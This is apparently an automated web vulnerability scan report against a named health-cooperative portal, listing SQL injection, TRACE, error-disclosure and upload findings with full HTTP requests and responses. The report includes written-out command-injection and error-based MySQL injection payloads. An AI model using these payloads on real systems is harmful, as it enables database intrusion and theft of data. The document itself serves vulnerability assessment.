OWASP A6 PCI v1.2-6.5.6 PCI v2.0-6.5.5 CWE-200 CAPEC-118 WASC-13
- /Comunicacao/detalhe.do

/Comunicacao/detalhe.do

http://www.unimed.com.br/Comunicacao/detalhe.do?acao=inicial&cdComunicacao=%22%26%20ping%20-n%2026%2..

Parameters

Parameter Type Value
acao GET inicial
cdComunicacao GET "& ping -n 26 127.0.0.1 &

Request

GET /Comunicacao/detalhe.do?acao=inicial&cdComunicacao=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: http://www.unimed.com.br/Comunicacao/busca.do
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=710CBF37322A9B4A56B96F96CAF25AE3.dcpr5034; JSESSIONID=19B6C6E1082BF10468FAF02C8120DAEF.dcpr5033; enquete_unimed_671=671
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 15 Nov 2011 17:13:55 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Length: 3551
Connection: close
Content-Type: text/html;charset=utf-8


<html><head><title>Apache Tomcat/5.5.9 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>javax.servlet.ServletException: Syntax error or access violation message from server: &quot;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '&quot;&amp; ping -n 26 127.0.0.1 &amp;' at line 1&quot; org.apache.struts.action.RequestProcessor.processException(RequestProcessor.java:516) org.apache.struts.action.RequestProcessor.processActionPerform(RequestProcessor.java:423) org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:226) org.apache.struts.action.ActionServlet.process(ActionServlet.java:1164) org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:397) javax.servlet.http.HttpServlet.service(HttpServlet.java:697) javax.servlet.http.HttpServlet.service(HttpServlet.java:810) org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:81)</pre></p><p><b>root cause</b> <pre>java.sql.SQLException: Syntax error or access violation message from server: &quot;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '&quot;&amp; ping -n 26 127.0.0.1 &amp;' at line 1&quot; com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:1997) com.mysql.jdbc.MysqlIO.sendCommand(MysqlIO.java:1167) com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:1278) com.mysql.jdbc.MysqlIO.sqlQuery(MysqlIO.java:1224) com.mysql.jdbc.Connection.execSQL(Connection.java:2244) com.mysql.jdbc.Connection.execSQL(Connection.java:2192) com.mysql.jdbc.Statement.executeQuery(Statement.java:1163) org.jboss.resource.adapter.jdbc.WrappedStatement.executeQuery(WrappedStatement.java:208) br.com.unimed.portal.veiculocomunicacao.dao.ComunicacaoDAO.populaComunicacao(ComunicacaoDAO.java:459) br.com.unimed.portal.veiculocomunicacao.action.DetalheAction.execute(DetalheAction.java:28) org.apache.struts.action.RequestProcessor.processActionPerform(RequestProcessor.java:421) org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:226) org.apache.struts.action.ActionServlet.process(ActionServlet.java:1164) org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:397) javax.servlet.http.HttpServlet.service(HttpServlet.java:697) javax.servlet.http.HttpServlet.service(HttpServlet.java:810) org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:81)</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.9 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.9</h3></body></html>
TRACE / TRACK Identified

TRACE / TRACK Identified

1 TOTAL
LOW
CONFIRMED
1
Netsparker identified that the TRACE/TRACK method is allowed.

Impact

If the application is vulnerable to Cross-site Scripting and uses Http-Only Cookies then an attacker can bypass the Http-Only cookies limitation and read the cookies in an XSS attack.

Remedy

Disable this method in all production systems. Even though the application is not vulnerable to Cross-site Scripting a debugging feature such as TRACE/TRACK should not be required in a production system and therefore should be disabled.

External References

Classification

OWASP A6 CWE-16 WASC-14
- /pct/index.jsp

/pct/index.jsp CONFIRMED

http://www.unimed.com.br/pct/index.jsp?cd_canal=54593

Request

TRACE /pct/index.jsp?cd_canal=54593 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=EE7A036FBAD0E62647D9B07D1BD80DEF.dcpr5033
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 15 Nov 2011 17:03:07 GMT
Server: Apache/2.2.15 (Red Hat)
Connection: close
Transfer-Encoding: chunked
Content-Type: message/http


TRACE /pct/index.jsp?cd_canal=54593 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=EE7A036FBAD0E62647D9B07D1BD80DEF.dcpr5033
Accept-Encoding: gzip, deflate

Tomcat Exception Report Disclosure

Tomcat Exception Report Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing exception report data in the HTTP response.

Impact

An attacker can obtain information such as: This information might help an attacker to gain more information and to potentially focus on the development of further attacks to the target system.

Remedy

Apply the following configuration to your web.xml file to prevent information leakage by applying custom error pages.
<error-page>
        <error-code>500</error-code>
        <location>/server_error.html</location>
</error-page>

Remedy References

Classification

OWASP A6 PCI v1.2-6.5.6 PCI v2.0-6.5.5 WASC-14
- /Comunicacao/detalhe.do

/Comunicacao/detalhe.do

http://www.unimed.com.br/Comunicacao/detalhe.do?acao=inicial&cdComunicacao=%22%26%20ping%20-n%2026%2..

Parameters

Parameter Type Value
acao GET inicial
cdComunicacao GET "& ping -n 26 127.0.0.1 &

Request

GET /Comunicacao/detalhe.do?acao=inicial&cdComunicacao=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: http://www.unimed.com.br/Comunicacao/busca.do
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=710CBF37322A9B4A56B96F96CAF25AE3.dcpr5034; JSESSIONID=19B6C6E1082BF10468FAF02C8120DAEF.dcpr5033; enquete_unimed_671=671
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 15 Nov 2011 17:13:55 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Length: 3551
Connection: close
Content-Type: text/html;charset=utf-8


<html><head><title>Apache Tomcat/5.5.9 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>javax.servlet.ServletException: Syntax error or access violation message from server: &quot;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '&quot;&amp; ping -n 26 127.0.0.1 &amp;' at line 1&quot; org.apache.struts.action.RequestProcessor.processException(RequestProcessor.java:516) org.apache.struts.action.RequestProcessor.processActionPerform(RequestProcessor.java:423) org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:226) org.apache.struts.action.ActionServlet.process(ActionServlet.java:1164) org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:397) javax.servlet.http.HttpServlet.service(HttpServlet.java:697) javax.servlet.http.HttpServlet.service(HttpServlet.java:810) org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:81)</pre></p><p><b>root cause</b> <pre>java.sql.SQLException: Syntax error or access violation message from server: &quot;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '&quot;&amp; ping -n 26 127.0.0.1 &amp;' at line 1&quot; com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:1997) com.mysql.jdbc.MysqlIO.sendCommand(MysqlIO.java:1167) com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:1278) com.mysql.jdbc.MysqlIO.sqlQuery(MysqlIO.java:1224) com.mysql.jdbc.Connection.execSQL(Connection.java:2244) com.mysql.jdbc.Connection.execSQL(Connection.java:2192) com.mysql.jdbc.Statement.executeQuery(Statement.java:1163) org.jboss.resource.adapter.jdbc.WrappedStatement.executeQuery(WrappedStatement.java:208) br.com.unimed.portal.veiculocomunicacao.dao.ComunicacaoDAO.populaComunicacao(ComunicacaoDAO.java:459) br.com.unimed.portal.veiculocomunicacao.action.DetalheAction.execute(DetalheAction.java:28) org.apache.struts.action.RequestProcessor.processActionPerform(RequestProcessor.java:421) org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:226) org.apache.struts.action.ActionServlet.process(ActionServlet.java:1164) org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:397) javax.servlet.http.HttpServlet.service(HttpServlet.java:697) javax.servlet.http.HttpServlet.service(HttpServlet.java:810) org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:81)</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.9 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.9</h3></body></html>
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /pct/

/pct/ CONFIRMED

http://www.unimed.com.br/pct/

Request

GET /pct/ HTTP/1.1
Referer: http://www.unimed.com.br/pct/index.jsp?cd_canal=54593
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Date: Tue, 15 Nov 2011 17:03:06 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Length: 290
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /pct/on this server.</p><hr><address>Apache/2.2.15 (Red Hat) Server at www.unimed.com.br Port 80</address></body></html>
File Upload Functionality Identified

File Upload Functionality Identified

1 TOTAL
INFORMATION
CONFIRMED
1
This page allows users to upload files to the web server. Upload forms are generally dangerous unless they are coded with a great deal of care. This issue is reported for information only. If there is any other vulnerability identified regarding this resource Netsparker will report it as a separate issue.
- /Comunicacao/novo.do

/Comunicacao/novo.do CONFIRMED

http://www.unimed.com.br/Comunicacao/novo.do

Form Name

nomeImagem

Request

GET /Comunicacao/novo.do HTTP/1.1
Referer: http://www.unimed.com.br/Comunicacao/busca.do
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=A8982A30B5E467D97208572723C4D074.dcpr5033; JSESSIONID=A8EE0043F78F85287E2B786677508F66.dcpr5033
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 15 Nov 2011 17:03:50 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><meta http-equiv="Content-Language" content="pt-BR"><title>Portal Nacional de Saúde :: Unimed do Brasil</title><meta name="description" content="Modelo de site externo com barra de menu."><meta name="keywords" content="Unimed, portal, saude, Brasil"><meta name="author" content="Dynamix Software Ltda (www.dynamix.com.br)."><meta name="copyright" content="Copyright (c) 2004 Dynamix Software Ltda."><!-- barra de navegacao --><link rel="stylesheet" type="text/css" href="./colaborador.css"><link rel="stylesheet" type="text/css" href="./estilos.css"><!-- folhas de estilo --></head><body><!-- INI TOPO --><div id="topo"><!-- ini logo unimed --><h1><img src="./imagens/logo_unimed.gif" alt="Unimed." title="Unimed."></h1><!-- fim logo unimed --><!-- ini fechar --><div><a href="javascript:window.close()" title="Fechar este site externo.">Fechar</a></div><!-- fim fechar --></div><!-- FIM TOPO --><!-- INI CONTEUDO --><div id="conteudo"><table class="estrutura" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td valign="top"><!-- ini barra de menu --><div class="menu"><!-- ini nome da unimed --><div class="nomeUnimed"><!-- Joaçaba --></div><!-- fim nome da unimed --><!-- ini menu --><ul><li class="titulo"><a href="#" class="titulo"><img class="seta" src="./imagens/seta_branca_abaixo.gif" alt="Voltar" border="0"><span></span></a>Veículos de Comunicação</li><li class="item"><a href="/Comunicacao/novo.do">Incluir Ve&iacute;culo de Comunica&ccedil;&atilde;o</a> </li><li class="item"><a href="/Comunicacao/busca.do?acaoLink=pesquisa">Consultar Ve&iacute;culos de Comunica&ccedil;&atilde;o</a></li></ul><!-- fim menu --></div><!-- fim barra de menu --></td><td><!-- ini cabecalho --><div class="cabecalho"><h2>Ve&iacute;culos de Comunica&ccedil;&atilde;o do Sistema Unimed </h2></div><!-- fim cabecalho --><!-- ini corpo --><div class="corpo"><!-- ini navegacao persistente -->Ve&iacute;culos de Comunica&ccedil;&atilde;o<!-- fim navegacao persistente --><!-- ini nome secao --><h5>Incluir Ve&iacute;culo </h5><!-- fim nome secao --><!-- ini conteudo da pagina --><div><form name="comunicacaoForm" method="post" action="/Comunicacao/cadastro.do" enctype="multipart/form-data"><input type="hidden" name="acao" value=""><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td><p class="b"><b>Unimed :</b><br><select name="cdUnimed"><option selected value="0">Selecione</option> <option value="865">CENTRAL NACIONAL UNIMED</option>
<option value="67">CENTRAL NACIONAL UNIMED - CLIENTES CARTEIRA 067</option>
<option value="974">CONFEDERAÇÃO NORTE/NORDESTE</option>
<option value="998">ESCRITÓRIO REGIONAL DE BRASÍLIA - ASSESSORIA JURÍDICA</option>
<option value="861">FEDERAÇÃO DA INCONFIDÊNCIA MINEIRA</option>
<option value="859">FEDERAÇÃO DA ZONA DA MATA MINEIRA</option>
<option value="985">FEDERAÇÃO DAS UNIMEDS DA AMAZÔNIA - FAMA</option>
<option value="515">FEDERAÇÃO DAS UNIMEDS DO DISTRITO FEDERAL E REGIÃO METROPOLITANA (EXTINTA)</option>
<option value="977">FEDERAÇÃO DO ESTADO DA BAHIA</option>
<option value="982">FEDERAÇÃO DO ESTADO DA PARAÍBA</option>
<option value="976">FEDERAÇÃO DO ESTADO DE SANTA CATARINA</option>
<option value="979">FEDERAÇÃO DO ESTADO DO CEARÁ</option>
<option value="989">FEDERAÇÃO DO ESTADO DO MATO GROSSO DO SUL</option>
<option value="975">FEDERAÇÃO DO ESTADO DO PARANÁ</option>
<option value="987">FEDERAÇÃO DO ESTADO DO PIAUÍ</option>
<option value="972">FEDERAÇÃO DO ESTADO DO RIO DE JANEIRO</option>
<option value="980">FEDERAÇÃO DO ESTADO DO RIO GRANDE DO NORTE</option>
<option value="973">FEDERAÇÃO INTERFEDERATIVA DO ESTADO DE MINAS GERAIS</option>
<option value="853">FEDERAÇÃO INTRAFEDERATIVA DO TRIÂNGULO MINEIRO E ALTO DO PARANAÍBA</option>
<option value="857">FEDERAÇÃO INTRAFEDERATIVA REGIONAL SUL DE MINAS</option>
<option value="858">FEDERAÇÃO LESTE NORDESTE DE MINAS</option>
<option value="501">FUNDAÇÃO UNIMED</option>
<option value="500">PORTAL UNIMED LTDA</option>
<option value="1002">UNIAIR</option>
<option value="11">UNIMED ABC</option>
<option value="309">UNIMED ABOLIÇÃO</option>
<option value="329">UNIMED ADAMANTINA</option>
<option value="997">UNIMED ADMINISTRAÇÃO E SERVIÇOS LTDA.</option>
<option value="308">UNIMED AGRESTE MERIDIONAL</option>
<option value="983">UNIMED ALAGOAS</option>
<option value="313">UNIMED ALAGOINHAS</option>
<option value="319">UNIMED ALEGRETE</option>
<option value="258">UNIMED ALÉM PARAÍBA</option>
<option value="240">UNIMED ALFENAS</option>
<option value="100">UNIMED ALTO DA SERRA</option>
<option value="613">UNIMED ALTO IRANI</option>
<option value="260">UNIMED ALTO JACUÍ</option>
<option value="195">UNIMED ALTO OESTE POTIGUAR</option>
<option value="310">UNIMED ALTO PARANAÍBA</option>
<option value="237">UNIMED ALTO SÃO FRANCISCO</option>
<option value="270">UNIMED ALTO URUGUAI</option>
<option value="300">UNIMED ALTO VALE</option>
<option value="192">UNIMED AMPARO</option>
<option value="178">UNIMED ANÁPOLIS</option>
<option value="295">UNIMED ANDRADAS</option>
<option value="489">UNIMED ANDRADINA</option>
<option value="341">UNIMED ANGRA DOS REIS</option>
<option value="151">UNIMED APUCARANA</option>
<option value="118">UNIMED AQUIDAUANA</option>
<option value="72">UNIMED ARAÇATUBA</option>
<option value="235">UNIMED ARAGUAIA (EX BARRA DO GARÇAS)</option>
<option value="264">UNIMED ARAGUAÍNA</option>
<option value="122">UNIMED ARAGUARI</option>
<option value="13">UNIMED ARARAQUARA</option>
<option value="120">UNIMED ARARAS</option>
<option value="290">UNIMED ARARUAMA</option>
<option value="164">UNIMED ARAXÁ</option>
<option value="320">UNIMED ARIQUEMES</option>
<option value="115">UNIMED ASSIS</option>
<option value="73">UNIMED AVARÉ</option>
<option value="160">UNIMED BARBACENA</option>
<option value="52">UNIMED BARRA MANSA</option>
<option value="267">UNIMED BARRETOS</option>
<option value="109">UNIMED BATATAIS</option>
<option value="22">UNIMED BAURU</option>
<option value="165">UNIMED BEBEDOURO</option>
<option value="88">UNIMED BELÉM</option>
<option value="6">UNIMED BELO HORIZONTE</option>
<option value="134">UNIMED BETIM</option>
<option value="197">UNIMED BIRIGUI</option>
<option value="26">UNIMED BLUMENAU</option>
<option value="136">UNIMED BOA VISTA</option>
<option value="24">UNIMED BOTUCATU</option>
<option value="327">UNIMED BRAGANÇA PAULISTA</option>
<option value="66">UNIMED BRASÍLIA</option>
<option value="331">UNIMED BRUSQUE</option>
<option value="125">UNIMED CABO FRIO</option>
<option value="332">UNIMED CAÇADOR</option>
<option value="91">UNIMED CAÇAPAVA</option>
<option value="318">UNIMED CÁCERES</option>
<option value="206">UNIMED CAICÓ</option>
<option value="534">UNIMED CAJAZEIRAS</option>
<option value="297">UNIMED CALDAS NOVAS</option>
<option value="35">UNIMED CAMPINA GRANDE</option>
<option value="2">UNIMED CAMPINAS</option>
<option value="239">UNIMED CAMPO BELO</option>
<option value="51">UNIMED CAMPO GRANDE</option>
<option value="205">UNIMED CAMPOS</option>
<option value="268">UNIMED CAMPOS DO JORDÃO</option>
<option value="611">UNIMED CANOINHAS</option>
<option value="153">UNIMED CAPIVARI</option>
<option value="173">UNIMED CARATINGA</option>
<option value="107">UNIMED CARIRI</option>
<option value="174">UNIMED CARUARU</option>
<option value="158">UNIMED CASCAVEL</option>
<option value="189">UNIMED CATAGUASES</option>
<option value="114">UNIMED CATALÃO</option>
<option value="16">UNIMED CATANDUVA</option>
<option value="1313">UNIMED CENTRAL DE SERVIÇOS AUXILIARES- RS</option>
<option value="53">UNIMED CENTRO - RS</option>
<option value="852">UNIMED CENTRO PAULISTA</option>
<option value="60">UNIMED CENTRO SUL (EXTINTA)</option>
<option value="248">UNIMED CENTRO SUL FLUMINENSE (EX BARRA DO PIRAÍ)</option>
<option value="238">UNIMED CENTRO-OESTE (EX PARÁ DE MINAS)</option>
<option value="855">UNIMED CENTRO-OESTE PAULISTA</option>
<option value="988">UNIMED CERRADO</option>
<option value="225">UNIMED CHAPADA DIAMANTINA</option>
<option value="227">UNIMED CHAPECÓ</option>
<option value="182">UNIMED CIANORTE</option>
<option value="156">UNIMED CIRCUITO DAS ÁGUAS</option>
<option value="627">UNIMED CONCÓRDIA</option>
<option value="85">UNIMED CONSELHEIRO LAFAIETE</option>
<option value="2000">UNIMED COOPERATIVA CENTRAL DE BENS E SERVIÇOS</option>
<option value="502">UNIMED COOPERATIVA CENTRAL DE BENS E SERVIÇOS - CAPIVARI</option>
<option value="281">UNIMED CORUMBÁ</option>
<option value="180">UNIMED COSTA DO SOL</option>
<option value="116">UNIMED COSTA OESTE</option>
<option value="231">UNIMED COSTA VERDE</option>
<option value="198">UNIMED CRICIÚMA</option>
<option value="10">UNIMED CRUZEIRO</option>
<option value="56">UNIMED CUIABÁ</option>
<option value="32">UNIMED CURITIBA</option>
<option value="628">UNIMED CURITIBANOS</option>
<option value="124">UNIMED CURRAIS NOVOS</option>
<option value="144">UNIMED DIVINÓPOLIS</option>
<option value="999">UNIMED DO BRASIL CONFEDERAÇÃO NACIONAL DAS COOPERATIVAS MÉDICAS</option>
<option value="984">UNIMED DO ES - FEDERAÇÃO DO ESTADO DO ESPÍRITO SANTO</option>
<option value="970">UNIMED DO ESTADO DE SÃO PAULO</option>
<option value="163">UNIMED DO SUDOESTE</option>
<option value="78">UNIMED DOURADOS</option>
<option value="232">UNIMED DRACENA</option>
<option value="269">UNIMED DUQUE DE CAXIAS (EXTINTA)</option>
<option value="277">UNIMED ENCOSTA DA SERRA/RS</option>
<option value="960">UNIMED EQUATORIAL</option>
<option value="28">UNIMED ERECHIM</option>
<option value="148">UNIMED EXTREMO OESTE CATARINENSE</option>
<option value="224">UNIMED EXTREMO SUL</option>
<option value="512">UNIMED FEDERAÇÃO BAIANA</option>
<option value="511">UNIMED FEDERAÇÃO DO ESTADO DO MATO GROSSO</option>
<option value="978">UNIMED FEDERAÇÃO INTERFEDERATIVA DO CENTRO OESTE E TOCANTINS</option>
<option value="103">UNIMED FEIRA DE SANTANA</option>
<option value="105">UNIMED FERNANDÓPOLIS</option>
<option value="301">UNIMED FERRABRAZ</option>
<option value="63">UNIMED FORTALEZA</option>
<option value="167">UNIMED FOZ DO IGUAÇU</option>
<option value="9">UNIMED FRANCA</option>
<option value="168">UNIMED FRANCISCO BELTRÃO</option>
<option value="339">UNIMED FRUTAL</option>
<option value="171">UNIMED GERAIS DE MINAS</option>
<option value="316">UNIMED GOIANÉSIA</option>
<option value="64">UNIMED GOIÂNIA</option>
<option value="236">UNIMED GOVERNADOR VALADARES</option>
<option value="25">UNIMED GRANDE FLORIANÓPOLIS</option>
<option value="76">UNIMED GUARAPUAVA</option>
<option value="215">UNIMED GUARARAPES</option>
<option value="20">UNIMED GUARATINGUETÁ</option>
<option value="280">UNIMED GUARUJÁ</option>
<option value="284">UNIMED GUARULHOS</option>
<option value="172">UNIMED GUAXUPÉ</option>
<option value="317">UNIMED GURUPI</option>
<option value="326">UNIMED IBITINGA</option>
<option value="131">UNIMED IGUATÚ</option>
<option value="209">UNIMED ILHÉUS</option>
<option value="98">UNIMED IMPERATRIZ</option>
<option value="155">UNIMED INCONFIDENTES</option>
<option value="311">UNIMED IPAMERI</option>
<option value="193">UNIMED ITABIRA</option>
<option value="101">UNIMED ITABUNA</option>
<option value="535">UNIMED ITAITUBA</option>
<option value="137">UNIMED ITAJUBÁ</option>
<option value="132">UNIMED ITAPETININGA</option>
<option value="325">UNIMED ITAPEVA</option>
<option value="273">UNIMED ITAQUI</option>
<option value="540">UNIMED ITATIBA</option>
<option value="257">UNIMED ITAÚNA</option>
<option value="223">UNIMED ITUIUTABA</option>
<option value="272">UNIMED JABOTICABAL</option>
<option value="261">UNIMED JALES</option>
<option value="634">UNIMED JARAGUÁ DO SUL</option>
<option value="253">UNIMED JATAÍ</option>
<option value="113">UNIMED JEQUIÉ</option>
<option value="304">UNIMED JI-PARANÁ</option>
<option value="335">UNIMED JOAÇABA</option>
<option value="200">UNIMED JOÃO MONLEVADE</option>
<option value="33">UNIMED JOÃO PESSOA</option>
<option value="27">UNIMED JOINVILLE</option>
<option value="49">UNIMED JUIZ DE FORA</option>
<option value="127">UNIMED JUNDIAÍ</option>
<option value="220">UNIMED LAGES</option>
<option value="252">UNIMED LAVRAS</option>
<option value="233">UNIMED LENÇÓIS PAULISTA</option>
<option value="241">UNIMED LEOPOLDINA</option>
<option value="17">UNIMED LESTE FLUMINENSE</option>
<option value="111">UNIMED LESTE PAULISTA</option>
<option value="93">UNIMED LIMEIRA</option>
&..
MySQL Database Identified

MySQL Database Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes.

Impact

This issue is reported as additional information only. There is no direct impact arising from this issue.
- /Comunicacao/detalhe.do

/Comunicacao/detalhe.do CONFIRMED

http://www.unimed.com.br/Comunicacao/detalhe.do?acao=inicial&cdComunicacao=(select+1+and+row(1%2c1)%..

Request

GET /Comunicacao/detalhe.do?acao=inicial&cdComunicacao=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Referer: http://www.unimed.com.br/Comunicacao/busca.do
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=5DD9C8CFD3D902CD91DF57B601077A4E.dcpr5033; JSESSIONID=19B6C6E1082BF10468FAF02C8120DAEF.dcpr5033; enquete_unimed_671=671
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 15 Nov 2011 17:14:15 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Length: 3405
Connection: close
Content-Type: text/html;charset=utf-8


<html><head><title>Apache Tomcat/5.5.9 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>javax.servlet.ServletException: Duplicate key or integrity constraint violation message from server: &quot;Duplicate entry '_!@4dilemma:0' for key 